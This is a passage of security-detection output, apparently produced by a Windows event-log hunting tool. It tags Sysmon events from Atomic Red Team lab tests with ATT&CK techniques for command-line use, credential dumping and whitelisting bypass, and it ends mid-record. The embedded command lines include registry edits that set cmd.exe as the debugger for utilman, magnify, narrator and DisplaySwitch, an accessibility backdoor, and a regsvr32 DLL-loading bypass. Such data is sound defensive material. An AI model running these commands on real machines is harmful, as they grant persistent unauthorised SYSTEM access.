<Data Name=""ProcessGuid"">747F3D96-D8A9-5D31-0000-001072C43200</Data>
<Data Name=""ProcessId"">6068</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547817.941637,2019-07-19T18:50:17.941637+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:14.827321Z"">
</TimeCreated>
<EventRecordID>3748</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:14.762</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A6-5D31-0000-0010F9B13200</Data>
<Data Name=""ProcessId"">6664</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547814.692289,2019-07-19T18:50:14.692289+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:14.678185Z"">
</TimeCreated>
<EventRecordID>3745</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:14.649</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A6-5D31-0000-001053A73200</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547814.678185,2019-07-19T18:50:14.678185+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:13.185016Z"">
</TimeCreated>
<EventRecordID>3744</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:13.173</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A5-5D31-0000-0010C0A03200</Data>
<Data Name=""ProcessId"">6116</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547813.127595,2019-07-19T18:50:13.127595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:13.109148Z"">
</TimeCreated>
<EventRecordID>3741</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:13.096</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A5-5D31-0000-0010729B3200</Data>
<Data Name=""ProcessId"">4212</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547813.109148,2019-07-19T18:50:13.109148+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:10.324832Z"">
</TimeCreated>
<EventRecordID>3740</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:10.306</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A2-5D31-0000-0010D8943200</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547810.282757,2019-07-19T18:50:10.282757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:10.266630Z"">
</TimeCreated>
<EventRecordID>3737</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:10.253</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A2-5D31-0000-00108A8F3200</Data>
<Data Name=""ProcessId"">6156</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547810.26663,2019-07-19T18:50:10.266630+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:07.357083Z"">
</TimeCreated>
<EventRecordID>3736</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:07.335</Data>
<Data Name=""ProcessGuid"">747F3D96-D89F-5D31-0000-0010BC823200</Data>
<Data Name=""ProcessId"">2404</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-20T11:51:09.842559Z"">
</TimeCreated>
<EventRecordID>1103</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""7212"" ThreadID=""5064"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DESKTOP-NTSSLJD</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">-</Data>
<Data Name=""UtcTime"">2020-10-20 11:51:09.588</Data>
<Data Name=""ProcessGuid"">23F38D93-CEB4-5F8E-9F08-000000000C00</Data>
<Data Name=""ProcessId"">9392</Data>
<Data Name=""Image"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">10.0.18362.1049 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">SAMLib.DLL</Data>
<Data Name=""Hashes"">SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-20T11:51:09.842559Z"">
</TimeCreated>
<EventRecordID>1103</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""7212"" ThreadID=""5064"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DESKTOP-NTSSLJD</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">-</Data>
<Data Name=""UtcTime"">2020-10-20 11:51:09.588</Data>
<Data Name=""ProcessGuid"">23F38D93-CEB4-5F8E-9F08-000000000C00</Data>
<Data Name=""ProcessId"">9392</Data>
<Data Name=""Image"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">10.0.18362.1049 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">SAMLib.DLL</Data>
<Data Name=""Hashes"">SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548027.083068,2019-07-19T18:53:47.083068+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.975169Z"">
</TimeCreated>
<EventRecordID>4046</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.938</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00102BE33800</Data>
<Data Name=""ProcessId"">4628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( &quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.893188Z"">
</TimeCreated>
